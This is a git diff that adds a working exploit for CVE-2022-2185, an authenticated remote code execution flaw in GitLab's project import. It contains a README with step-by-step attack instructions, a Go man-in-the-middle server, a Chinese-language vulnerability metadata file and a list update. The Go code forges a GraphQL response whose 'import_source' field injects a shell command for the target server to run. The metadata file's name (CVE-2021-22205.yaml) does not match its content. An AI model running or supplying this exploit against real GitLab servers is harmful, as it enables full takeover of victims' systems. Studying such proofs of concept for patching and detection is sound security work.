diff --git a/cve/gitlab/2022/CVE-2022-2185/README.md b/cve/gitlab/2022/CVE-2022-2185/README.md new file mode 100644 index 0000000000000000000000000000000000000000..e2d1134c7c805fb511fd9a49f3c93883d514273e --- /dev/null +++ b/cve/gitlab/2022/CVE-2022-2185/README.md @@ -0,0 +1,29 @@ +# CVE-2022-2185 +wo ee cve-2022-2185 gitlab authenticated rce + +read: https://starlabs.sg/blog/2022/07-gitlab-project-import-rce-analysis-cve-2022-2185/ + +## how to use + +First spawn a gitlab instance. Log in, create a group and project with a unique name. Create an access token. + +Edit these lines in main.go and compile it: + +```go +const importProjectName = "projectwtf" +const runCmd = "/bin/sleep inf" +const proxyTo = "http://localhost:8000/" +``` + +This mitm runs on `*:8100`. Expose it to the Internet. + +Log in to target server. Navigate to create a group - import and enter the local server details. When you are going to import, intercept the request and change it: + +- `source_type` to `project_entity` +- `source_full_path` to `your_group/your_project` +- if `destination_namespace` is empty, change it to any non-empty name +- `destination_name` is not empty by design + +Pass the modified request to server. Wait 255s to get rce. + +Note: the command may be run multiple times. diff --git a/cve/gitlab/2022/CVE-2022-2185/main.go b/cve/gitlab/2022/CVE-2022-2185/main.go new file mode 100644 index 0000000000000000000000000000000000000000..8c37bfe8e9b707aacc9f8e52050f62232f70d0fa --- /dev/null +++ b/cve/gitlab/2022/CVE-2022-2185/main.go @@ -0,0 +1,76 @@ +package main + +import ( + "io" + "os" + "fmt" + "bytes" + "net/url" + "net/http" + "net/http/httputil" +) + +const importProjectName = "projectwtf" +const runCmd = "/bin/sleep inf" +const proxyTo = "http://localhost:8000/" +var proxyToUrl *url.URL + +func init() { + var err error + proxyToUrl, err = url.Parse(proxyTo) + if err != nil { + panic(err) + } +} + +func perror(a ...any) { + fmt.Fprintln(os.Stderr, a...) +} + +func proxy(w http.ResponseWriter, r *http.Request) { + perror("IN:", r.Method, r.RequestURI) + + // mitm code + if r.Method == "POST" && r.RequestURI == "/api/graphql" { + perror("NOTICE: check") + bb, err := io.ReadAll(r.Body) + r.Body.Close() + if err != nil { + http.Error(w, err.Error(), http.StatusBadRequest) + return + } + + if bytes.Contains(bb, []byte(importProjectName)) { + perror("NOTICE: replace") + // send our fake response + hd := w.Header() + hd.Set("Content-Type", "application/json; charset=utf-8") + hd.Set("Permissions-Policy", "interest-cohort=()") + hd.Set("Referrer-Policy", "strict-origin-when-cross-origin") + w.WriteHeader(200) + w.Write( + []byte( + `{"data":{"project":{"description":"Example plain HTML site using GitLab Pages: https://pages.gitlab.io/plain-html","visibility":"public","archived":false,"created_at":"2022-07-29T08:17:46Z","shared_runners_enabled":true,"container_registry_enabled":false,"only_allow_merge_if_pipeline_succeeds":false,"only_allow_merge_if_all_discussions_are_resolved":false,"request_access_enabled":false,"printing_merge_request_link_enabled":true,"remove_source_branch_after_merge":true,"autoclose_referenced_issues":true,"suggestion_commit_message":null,"wiki_enabled":false,"template_name":"plainhtml","import_source":"$(`+runCmd+`)"}}}`, + ), + ) + return // do not pass to proxy + } else { + //fmt.Println(string(bb)) + // restore the body that we have read + r.Body = io.NopCloser(bytes.NewBuffer(bb)) + } + } + + rp := httputil.NewSingleHostReverseProxy(proxyToUrl) + rp.ServeHTTP(w, r) +} + +func main() { + mux := http.NewServeMux() + mux.HandleFunc("/", proxy) + s := &http.Server { + Addr: "0.0.0.0:8100", + Handler: mux, + } + s.ListenAndServe() +} diff --git a/cve/gitlab/2022/yaml/CVE-2021-22205.yaml b/cve/gitlab/2022/yaml/CVE-2021-22205.yaml new file mode 100644 index 0000000000000000000000000000000000000000..bbcfb74e9154ae15a197bde6cc34a82176af45e9 --- /dev/null +++ b/cve/gitlab/2022/yaml/CVE-2021-22205.yaml @@ -0,0 +1,23 @@ +id: CVE-2022-2185 +source: https://github.com/ESUAdmin/CVE-2022-2185 +info: + name: Gitlab Project import 远程代码执行漏洞 + severity: critical + description: | + -GitLab是一个用于仓库管理系统的开源项目。漏洞利用需要经过登录认证,经过认证的攻击者可以利用project导入功能执行任意代码,控制服务器。 + scope-of-influence: + GitLab CE/EE 14.0.x < 14.10.5 + GitLab CE/EE 15.0.x < 15.0.4 + GitLab CE/EE 15.1.x < 15.1.1 + reference: + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2185.json Vendor Advisory + - https://gitlab.com/gitlab-org/gitlab/-/issues/366088 Broken Link + - https://hackerone.com/reports/1609965 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-2185 + cwe-id: CWE-732 + cnvd-id: None + kve-id: None + tags: cve2022,gitlab \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 323454b7beb22c218ff26e79627829ece37c6ab0..020de91cbe8bab48345fb3e17dedd0f1df780334 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -21,6 +21,7 @@ cve: - CVE-2023-22809 gitlab: - CVE-2021-22205 + - CVE-2022-2185 confluence: - CVE-2019-3396 - CVE-2021-26084